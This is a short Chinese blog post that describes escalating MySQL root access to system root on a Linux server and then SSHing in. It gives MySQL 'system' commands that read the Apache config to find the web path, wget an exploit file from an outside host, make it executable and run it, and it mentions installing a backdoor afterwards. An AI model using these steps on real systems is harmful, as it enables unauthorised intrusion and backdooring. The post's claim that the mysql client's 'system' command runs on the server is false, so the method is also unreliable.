今天feng問了一個問題,mysql root權限運行,直接root服務器吧,SSH登錄
正好上網查一下相關的資料:
mysql 5.x里面引入了一個system函數,這個函數可以執行系統命令,當mysql以root登陸的時候,就可以利用這個函數執行命令,當然是在權限許可的 范圍內。
按照上面的方法,我們需要知道web的絕對路徑,當然這個很不好找,有些有sqlinjection的,可能報錯會顯示出來,有的就不一定了。但是 按照我的的方法,沒有必要再去找web路徑了,直接執行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接這樣就可以找到web的路徑,當然,我們的目的並不是找web路徑,放webshell進去。我們是要來做其他的事情,比如,下載exp執行, 搞到 root權限,然后裝后門蝦米的
mysql>system wget http://www.baidu.org.tw/xxxx ;
mysql>system chmod +x xxxx;
mysql>system ./xxxx;
這樣mysql的root此時就成為system的root了,剩下的事情,如果開了ssh,就ssh上去,輸入mysql的用戶密碼,ok,搞定。
相關資料:
http://www.linuxidc.com/Linux/2010-12/30787.htm
http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390